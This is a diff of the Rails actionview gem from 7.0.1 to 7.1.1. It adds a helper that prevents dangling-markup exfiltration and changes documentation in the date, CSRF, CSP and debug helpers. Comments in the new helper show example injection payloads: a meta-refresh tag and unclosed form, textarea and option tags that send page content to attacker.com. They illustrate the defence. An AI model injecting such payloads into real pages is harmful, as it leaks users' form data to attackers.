actionview 7.0.1 → 7.1.1

data/lib/action_view/helpers/content_exfiltration_prevention_helper.rb

@@ -0,0 +1,70 @@
+# frozen_string_literal: true
+
+module ActionView
+  module Helpers
+    module ContentExfiltrationPreventionHelper
+      mattr_accessor :prepend_content_exfiltration_prevention, default: false
+
+      # Close any open attributes before each form tag. This prevents attackers from
+      # injecting partial tags that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <meta http-equiv="refresh" content='0;URL=https://attacker.com?
+      #
+      # The HTML following this tag, up until the next single quote would be sent to
+      # +https://attacker.com+. By closing any open attributes, we ensure that form
+      # contents are never exfiltrated this way.
+      CLOSE_QUOTES_COMMENT = %q(<!-- '"` -->).html_safe.freeze
+
+      # Close any open tags that support CDATA (textarea, xmp) before each form tag.
+      # This prevents attackers from injecting unclosed tags that could capture
+      # form contents.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com"><textarea>
+      #
+      # The HTML following this tag, up until the next <tt></textarea></tt> or
+      # the end of the document would be captured by the attacker's
+      # <tt><textarea></tt>. By closing any open textarea tags, we ensure that
+      # form contents are never exfiltrated.
+      CLOSE_CDATA_COMMENT = "<!-- </textarea></xmp> -->".html_safe.freeze
+
+      # Close any open option tags before each form tag. This prevents attackers
+      # from injecting unclosed options that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com"><option>
+      #
+      # The HTML following this tag, up until the next <tt></option></tt> or the
+      # end of the document would be captured by the attacker's
+      # <tt><option></tt>. By closing any open option tags, we ensure that form
+      # contents are never exfiltrated.
+      CLOSE_OPTION_TAG = "</option>".html_safe.freeze
+
+      # Close any open form tags before each new form tag. This prevents attackers
+      # from injecting unclosed forms that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com">
+      #
+      # The form elements following this tag, up until the next <tt></form></tt>
+      # would be captured by the attacker's <tt><form></tt>. By closing any open
+      # form tags, we ensure that form contents are never exfiltrated.
+      CLOSE_FORM_TAG = "</form>".html_safe.freeze
+
+      CONTENT_EXFILTRATION_PREVENTION_MARKUP = (CLOSE_QUOTES_COMMENT + CLOSE_CDATA_COMMENT + CLOSE_OPTION_TAG + CLOSE_FORM_TAG).freeze
+
+      def prevent_content_exfiltration(html)
+        if prepend_content_exfiltration_prevention
+          CONTENT_EXFILTRATION_PREVENTION_MARKUP + html
+        else
+          html
+        end
+      end
+    end
+  end
+end

data/lib/action_view/helpers/controller_helper.rb

@@ -4,6 +4,8 @@ require "active_support/core_ext/module/attr_internal"
 
 module ActionView
   module Helpers # :nodoc:
+    # = Action View Controller \Helpers
+    #
     # This module keeps all methods and behavior in ActionView
     # that simply delegates to the controller.
     module ControllerHelper # :nodoc:
@@ -20,6 +22,10 @@ module ActionView
           @_request = controller.request if controller.respond_to?(:request)
           @_config  = controller.config.inheritable_copy if controller.respond_to?(:config)
           @_default_form_builder = controller.default_form_builder if controller.respond_to?(:default_form_builder)
+        else
+          @_request ||= nil
+          @_config ||= nil
+          @_default_form_builder ||= nil
         end
       end
 

data/lib/action_view/helpers/csp_helper.rb

@@ -1,8 +1,8 @@
 # frozen_string_literal: true
 
 module ActionView
-  # = Action View CSP Helper
   module Helpers # :nodoc:
+    # = Action View CSP \Helpers
     module CspHelper
       # Returns a meta tag "csp-nonce" with the per-session nonce value
       # for allowing inline <script> tags.
@@ -11,7 +11,7 @@ module ActionView
       #     <%= csp_meta_tag %>
       #   </head>
       #
-      # This is used by the Rails UJS helper to create dynamically
+      # This is used by the \Rails UJS helper to create dynamically
       # loaded inline <script> elements.
       #
       def csp_meta_tag(**options)

data/lib/action_view/helpers/csrf_helper.rb

@@ -1,8 +1,8 @@
 # frozen_string_literal: true
 
 module ActionView
-  # = Action View CSRF Helper
   module Helpers # :nodoc:
+    # = Action View CSRF \Helpers
     module CsrfHelper
       # Returns meta tags "csrf-param" and "csrf-token" with the name of the cross-site
       # request forgery protection parameter and token, respectively.
@@ -16,8 +16,8 @@ module ActionView
       #
       # You don't need to use these tags for regular forms as they generate their own hidden fields.
       #
-      # For AJAX requests other than GETs, extract the "csrf-token" from the meta-tag and send as the
-      # "X-CSRF-Token" HTTP header. If you are using rails-ujs this happens automatically.
+      # For Ajax requests other than GETs, extract the "csrf-token" from the meta-tag and send as the
+      # +X-CSRF-Token+ HTTP header. If you are using rails-ujs, this happens automatically.
       #
       def csrf_meta_tags
         if defined?(protect_against_forgery?) && protect_against_forgery?

data/lib/action_view/helpers/date_helper.rb

@@ -10,7 +10,7 @@ require "active_support/core_ext/object/with_options"
 
 module ActionView
   module Helpers # :nodoc:
-    # = Action View Date Helpers
+    # = Action View \Date \Helpers
     #
     # The Date Helper primarily creates select/option tags for different kinds of dates and times or date and time
     # elements. All of the select-type methods share a number of common options that are as follows:
@@ -26,7 +26,7 @@ module ActionView
       MINUTES_IN_QUARTER_YEAR = 131400
       MINUTES_IN_THREE_QUARTERS_YEAR = 394200
 
-      # Reports the approximate distance in time between two Time, Date or DateTime objects or integers as seconds.
+      # Reports the approximate distance in time between two Time, Date, or DateTime objects or integers as seconds.
       # Pass <tt>include_seconds: true</tt> if you want more detailed approximations when distance < 1 min, 29 secs.
       # Distances are reported based on the following table:
       #
@@ -72,7 +72,7 @@ module ActionView
       #   distance_of_time_in_words(to_time, from_time, include_seconds: true)                        # => about 6 years
       #   distance_of_time_in_words(Time.now, Time.now)                                               # => less than a minute
       #
-      # With the <tt>scope</tt> option, you can define a custom scope for Rails
+      # With the <tt>scope</tt> option, you can define a custom scope for \Rails
       # to look up the translation.
       #
       # For example you can define the following in your locale (e.g. en.yml).
@@ -217,7 +217,7 @@ module ActionView
       # * <tt>:order</tt>             - Set to an array containing <tt>:day</tt>, <tt>:month</tt> and <tt>:year</tt> to
       #   customize the order in which the select fields are shown. If you leave out any of the symbols, the respective
       #   select will not be shown (like when you set <tt>discard_xxx: true</tt>. Defaults to the order defined in
-      #   the respective locale (e.g. [:year, :month, :day] in the en locale that ships with Rails).
+      #   the respective locale (e.g. [:year, :month, :day] in the en locale that ships with \Rails).
       # * <tt>:include_blank</tt>     - Include a blank option in every select field so it's possible to set empty
       #   dates.
       # * <tt>:default</tt>           - Set a default date if the affected date isn't set or is +nil+.
@@ -291,12 +291,12 @@ module ActionView
         Tags::DateSelect.new(object_name, method, self, options, html_options).render
       end
 
-      # Returns a set of select tags (one for hour, minute and optionally second) pre-selected for accessing a
+      # Returns a set of select tags (one for hour, minute, and optionally second) pre-selected for accessing a
       # specified time-based attribute (identified by +method+) on an object assigned to the template (identified by
       # +object+). You can include the seconds with <tt>:include_seconds</tt>. You can get hours in the AM/PM format
       # with <tt>:ampm</tt> option.
       #
-      # This method will also generate 3 input hidden tags, for the actual year, month and day unless the option
+      # This method will also generate 3 input hidden tags, for the actual year, month, and day unless the option
       # <tt>:ignore_date</tt> is set to +true+. If you set the <tt>:ignore_date</tt> to +true+, you must have a
       # +date_select+ on the same method within the form otherwise an exception will be raised.
       #
@@ -320,6 +320,10 @@ module ActionView
       #   # You can set :ampm option to true which will show the hours as: 12 PM, 01 AM .. 11 PM.
       #   time_select 'game', 'game_time', { ampm: true }
       #
+      #   # You can set :ignore_date option to true which will remove the hidden inputs for day,
+      #   # month, and year that are set by default on this helper when you only want the time inputs
+      #   time_select 'game', 'game_time', { ignore_date: true }
+      #
       # The selects are prepared for multi-parameter assignment to an Active Record object.
       #
       # Note: If the day is not included as an option but the month is, the day will be set to the 1st to ensure that
@@ -844,14 +848,14 @@ module ActionView
         if @options[:use_hidden] || @options[:discard_year]
           build_hidden(:year, val)
         else
-          options                     = {}
-          options[:start]             = @options[:start_year] || middle_year - 5
-          options[:end]               = @options[:end_year] || middle_year + 5
-          options[:step]              = options[:start] < options[:end] ? 1 : -1
-          options[:leading_zeros]     = false
-          options[:max_years_allowed] = @options[:max_years_allowed] || 1000
-
-          if (options[:end] - options[:start]).abs > options[:max_years_allowed]
+          options         = {}
+          options[:start] = @options[:start_year] || middle_year - 5
+          options[:end]   = @options[:end_year] || middle_year + 5
+          options[:step]  = options[:start] < options[:end] ? 1 : -1
+
+          max_years_allowed = @options[:max_years_allowed] || 1000
+
+          if (options[:end] - options[:start]).abs > max_years_allowed
             raise ArgumentError, "There are too many years options to be built. Are you sure you haven't mistyped something? You can provide the :max_years_allowed parameter."
           end
 
@@ -871,6 +875,10 @@ module ActionView
           end
         end
 
+        def prompt_text(prompt, type)
+          prompt.kind_of?(String) ? prompt : I18n.translate(:"datetime.prompts.#{type}", locale: @options[:locale])
+        end
+
         # If the day is hidden, the day should be set to the 1st so all month and year choices are
         # valid. Otherwise, February 31st or February 29th, 2011 can be selected, which are invalid.
         def set_day_if_discarded
@@ -884,7 +892,7 @@ module ActionView
         def month_names
           @month_names ||= begin
             month_names = @options[:use_month_names] || translated_month_names
-            month_names.unshift(nil) if month_names.size < 13
+            month_names = [nil, *month_names] if month_names.size < 13
             month_names
           end
         end
@@ -932,7 +940,7 @@ module ActionView
         #
         #   month_name(1) # => 1
         #
-        # If the <tt>:use_two_month_numbers</tt> option is passed:
+        # If the <tt>:use_two_digit_numbers</tt> option is passed:
         #
         #   month_name(1) # => '01'
         #
@@ -997,22 +1005,25 @@ module ActionView
         end
 
         # Build select option HTML from date value and options.
-        #  build_options(15, start: 1, end: 31)
-        #  => "<option value="1">1</option>
-        #      <option value="2">2</option>
-        #      <option value="3">3</option>..."
         #
-        # If <tt>use_two_digit_numbers: true</tt> option is passed
-        #  build_options(15, start: 1, end: 31, use_two_digit_numbers: true)
-        #  => "<option value="1">01</option>
-        #      <option value="2">02</option>
-        #      <option value="3">03</option>..."
+        #   build_options(15, start: 1, end: 31)
+        #   => "<option value="1">1</option>
+        #       <option value="2">2</option>
+        #       <option value="3">3</option>..."
+        #
+        # If <tt>use_two_digit_numbers: true</tt> option is passed:
+        #
+        #   build_options(15, start: 1, end: 31, use_two_digit_numbers: true)
+        #   => "<option value="1">01</option>
+        #       <option value="2">02</option>
+        #       <option value="3">03</option>..."
         #
-        # If <tt>:step</tt> options is passed
-        #  build_options(15, start: 1, end: 31, step: 2)
-        #  => "<option value="1">1</option>
-        #      <option value="3">3</option>
-        #      <option value="5">5</option>..."
+        # If <tt>:step</tt> options is passed:
+        #
+        #   build_options(15, start: 1, end: 31, step: 2)
+        #   => "<option value="1">1</option>
+        #       <option value="3">3</option>
+        #       <option value="5">5</option>..."
         def build_options(selected, options = {})
           options = {
             leading_zeros: true, ampm: false, use_two_digit_numbers: false
@@ -1037,22 +1048,25 @@ module ActionView
         end
 
         # Build select option HTML for day.
-        #  build_day_options(2)
-        #  => "<option value="1">1</option>
-        #      <option value="2" selected="selected">2</option>
-        #      <option value="3">3</option>..."
+        #
+        #   build_day_options(2)
+        #   => "<option value="1">1</option>
+        #       <option value="2" selected="selected">2</option>
+        #       <option value="3">3</option>..."
         #
         # If <tt>day_format: ->(day) { day.ordinalize }</tt> option is passed to DateTimeSelector
-        #  build_day_options(2)
-        #  => "<option value="1">1st</option>
-        #      <option value="2" selected="selected">2nd</option>
-        #      <option value="3">3rd</option>..."
+        #
+        #   build_day_options(2)
+        #   => "<option value="1">1st</option>
+        #       <option value="2" selected="selected">2nd</option>
+        #       <option value="3">3rd</option>..."
         #
         # If <tt>use_two_digit_numbers: true</tt> option is passed to DateTimeSelector
-        #  build_day_options(2)
-        #  => "<option value="1">01</option>
-        #      <option value="2" selected="selected">02</option>
-        #      <option value="3">03</option>..."
+        #
+        #   build_day_options(2)
+        #   => "<option value="1">01</option>
+        #       <option value="2" selected="selected">02</option>
+        #       <option value="3">03</option>..."
         def build_day_options(selected)
           select_options = []
           (1..31).each do |value|
@@ -1066,17 +1080,11 @@ module ActionView
         end
 
         # Build select option HTML for year.
-        # If <tt>year_format</tt> option is not passed
-        #  build_year_options(1998, start: 1998, end: 2000)
-        #  => "<option value="1998" selected="selected">1998</option>
-        #      <option value="1999">1999</option>
-        #      <option value="2000">2000</option>"
         #
-        # If <tt>year_format</tt> option is passed
-        #  build_year_options(1998, start: 1998, end: 2000, year_format: ->year { "Heisei #{ year - 1988 }" })
-        #  => "<option value="1998" selected="selected">Heisei 10</option>
-        #      <option value="1999">Heisei 11</option>
-        #      <option value="2000">Heisei 12</option>"
+        #   build_year_options(1998, start: 1998, end: 2000)
+        #   => "<option value="1998" selected="selected">1998</option>
+        #       <option value="1999">1999</option>
+        #       <option value="2000">2000</option>"
         def build_year_options(selected, options = {})
           start = options.delete(:start)
           stop = options.delete(:end)
@@ -1094,10 +1102,11 @@ module ActionView
         end
 
         # Builds select tag from date type and HTML select options.
-        #  build_select(:month, "<option value="1">January</option>...")
-        #  => "<select id="post_written_on_2i" name="post[written_on(2i)]">
-        #        <option value="1">January</option>...
-        #      </select>"
+        #
+        #   build_select(:month, "<option value="1">January</option>...")
+        #   => "<select id="post_written_on_2i" name="post[written_on(2i)]">
+        #         <option value="1">January</option>...
+        #       </select>"
         def build_select(type, select_options_as_html)
           select_options = {
             id: input_id_from_type(type),
@@ -1114,9 +1123,10 @@ module ActionView
           (content_tag("select", select_html.html_safe, select_options) + "\n").html_safe
         end
 
-        # Builds the CSS class value for the select element
-        #  css_class_attribute(:year, 'date optional', { year: 'my-year' })
-        #  => "date optional my-year"
+        # Builds the CSS class value for the select element.
+        #
+        #   css_class_attribute(:year, 'date optional', { year: 'my-year' })
+        #   => "date optional my-year"
         def css_class_attribute(type, html_options_class, options) # :nodoc:
           css_class = \
             case options
@@ -1130,8 +1140,9 @@ module ActionView
         end
 
         # Builds a prompt option tag with supplied options or from default options.
-        #  prompt_option_tag(:month, prompt: 'Select month')
-        #  => "<option value="">Select month</option>"
+        #
+        #   prompt_option_tag(:month, prompt: 'Select month')
+        #   => "<option value="">Select month</option>"
         def prompt_option_tag(type, options)
           prompt = \
             case options
@@ -1144,12 +1155,13 @@ module ActionView
               I18n.translate(:"datetime.prompts.#{type}", locale: @options[:locale])
             end
 
-          prompt ? content_tag("option", prompt, value: "") : ""
+          prompt ? content_tag("option", prompt_text(prompt, type), value: "") : ""
         end
 
         # Builds hidden input tag for date part and value.
-        #  build_hidden(:year, 2008)
-        #  => "<input type="hidden" id="date_year" name="date[year]" value="2008" autocomplete="off" />"
+        #
+        #   build_hidden(:year, 2008)
+        #   => "<input type="hidden" id="date_year" name="date[year]" value="2008" autocomplete="off" />"
         def build_hidden(type, value)
           select_options = {
             type: "hidden",

data/lib/action_view/helpers/debug_helper.rb

@@ -3,10 +3,10 @@
 require "action_view/helpers/tag_helper"
 
 module ActionView
-  # = Action View Debug Helper
-  #
-  # Provides a set of methods for making it easier to debug Rails objects.
   module Helpers # :nodoc:
+    # = Action View Debug \Helpers
+    #
+    # Provides a set of methods for making it easier to debug \Rails objects.
     module DebugHelper
       include TagHelper